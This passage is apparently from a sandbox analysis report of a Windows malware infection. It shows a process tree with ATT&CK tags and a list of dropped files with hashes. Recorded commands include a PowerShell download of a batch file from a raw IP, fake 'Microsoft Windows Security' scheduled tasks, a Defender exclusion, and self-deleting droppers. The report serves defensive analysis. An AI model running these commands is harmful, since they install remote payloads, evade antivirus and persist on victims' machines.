                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
                                                                                                                                        9⤵
                                                                                                                                          PID:4452
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                                                                                                                                          9⤵
                                                                                                                                            PID:5208
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
                                                                                                                                            9⤵
                                                                                                                                              PID:7136
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                                                                                                                                              9⤵
                                                                                                                                                PID:6492
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
                                                                                                                                                9⤵
                                                                                                                                                  PID:4556
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6956
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                                                                                                                                                    9⤵
                                                                                                                                                      PID:6972
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:8
                                                                                                                                                      9⤵
                                                                                                                                                        PID:27172
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5336 /prefetch:2
                                                                                                                                                        9⤵
                                                                                                                                                          PID:28408
                                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                                        attrib +s +h d:\net
                                                                                                                                                        8⤵
                                                                                                                                                        • Sets file to hidden
                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                        PID:5752
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                                                                                                                                                        8⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:1664
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                                                                                                                                                        8⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:1960
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:4060
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\4434.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:8
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4688
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
                                                                                                                                              3⤵
                                                                                                                                                PID:6476
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe > nul
                                                                                                                                                  4⤵
                                                                                                                                                    PID:48616
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:9696
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:48284
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:10512
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:26012
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:27600
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                              PID:11764
                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                5⤵
                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:11872
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:27892
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:13096
                                                                                                                                                              • C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                systeminfo
                                                                                                                                                                4⤵
                                                                                                                                                                • Gathers system information
                                                                                                                                                                PID:13180
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:28040
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:28620
                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:28660
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:28280
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:28388
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:28600
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Edge.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Edge.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:28644
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:10960
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:11064
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:11116
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:6112
                                                                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1980
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:5924
                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                  C:\Windows\System32\conhost.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:4312
                                                                                                                                                                                • C:\Windows\System32\dwm.exe
                                                                                                                                                                                  C:\Windows\System32\dwm.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4108
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:1516
                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                    C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5060
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      PID:4824
                                                                                                                                                                                    • C:\Windows\System32\dwm.exe
                                                                                                                                                                                      C:\Windows\System32\dwm.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5188
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\System.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\System.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:1532
                                                                                                                                                                                    • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                      "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:5760
                                                                                                                                                                                    • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                      "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4604
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5604 -ip 5604
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:772
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5492
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\System.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\System.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5204
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5208
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:536
                                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:6156
                                                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:6268
                                                                                                                                                                                                  • C:\ProgramData\javaw.exe
                                                                                                                                                                                                    C:\ProgramData\javaw.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:47024
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 47024 -s 304
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:48312
                                                                                                                                                                                                    • C:\Windows\system32\WerFaultSecure.exe
                                                                                                                                                                                                      "C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 3224 -i 3224 -h 416 -j 408 -s 448 -d 6092
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:48976
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 47024 -ip 47024
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:48244
                                                                                                                                                                                                        • C:\Windows\system32\WerFaultSecure.exe
                                                                                                                                                                                                          C:\Windows\system32\WerFaultSecure.exe -u -p 3224 -s 1228
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:48336
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:48568
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:48580
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:48592
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\boleto.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\boleto.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:10124
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\System.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\System.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:28052
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:28060
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:28068
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:28076

                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                          • C:\$Recycle.Bin\HOW_TO_DECRYPT.txt

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            80207d0f8ea42bdfeaf9f5c586230aca

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            747481fe2b0b6d81c3b19ba62d1e49eab6a5461f

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            25edefb3b0678dfe0d927ff48ce67254359ba379df9468f634d02c026f0e7131

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            73f68ce9e98d2346be1762bd54bb06ef83ae939dfbcf9b786d9b773fa454352613387d264b7a87a1c08950226553817bf01f5aa4107bc12de36a1689e2137304

                                                                                                                                                                                                                          • C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_cca0d105-8260-4611-8c12-bd85a7208b9f

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            0158fe9cead91d1b027b795984737614

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            b41a11f909a7bdf1115088790a5680ac4e23031b

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            513257326e783a862909a2a0f0941d6ff899c403e104fbd1dbc10443c41d9f9a

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            c48a55cc7a92cefcefe5fb2382ccd8ef651fc8e0885e88a256cd2f5d83b824b7d910f755180b29eccb54d9361d6af82f9cc741bd7e6752122949b657da973676

                                                                                                                                                                                                                          • C:\ProgramData\remcos\logs.dat

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            216B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            2fd947b90607000d0ab8bbb0bc66b283

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            9d3f1d7712efceba9c1e602a41bb8db6bfdcae9c

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            a7796555d5ed8c146925ec8fa0c6426b5a24e3f6d811d8925999db37d2a0ecf0

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            d147a8785eacb9d42d38c5d988ba6410a5b2430c43ae4ff1bf5cabab8d6b69695c3054c1935e4c7cb6afc54deeb397a3786c40bd4b1fa4c86f51e9207f19840f

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1989129625.exe.log

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            425B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            fff5cbccb6b31b40f834b8f4778a779a

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            899ed0377e89f1ed434cfeecc5bc0163ebdf0454

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            baf55b95da4a601229647f25dad12878

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            abc16954ebfd213733c4493fc1910164d825cac8

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome11.exe.log

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            d63757807de58ed2437162d1bbfffdee

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            1c251282d981051f8d7c3ad19f38475d88a2e640

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            be8f787bc08be98cad11b4204cfa7720362747cc9a8c8c36412d843f8b8ac414

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            6b0f095b65796a62e74d0432115a9b51c2b12fc8c96fb94393ba8a392d6c1e12ee43fa579116a7814639b9b89ebe6906c20dbe0437fa2501ac4ac36328434064

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            152B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            e443ee4336fcf13c698b8ab5f3c173d0

                                                                                                                                                                                                                            SHA1

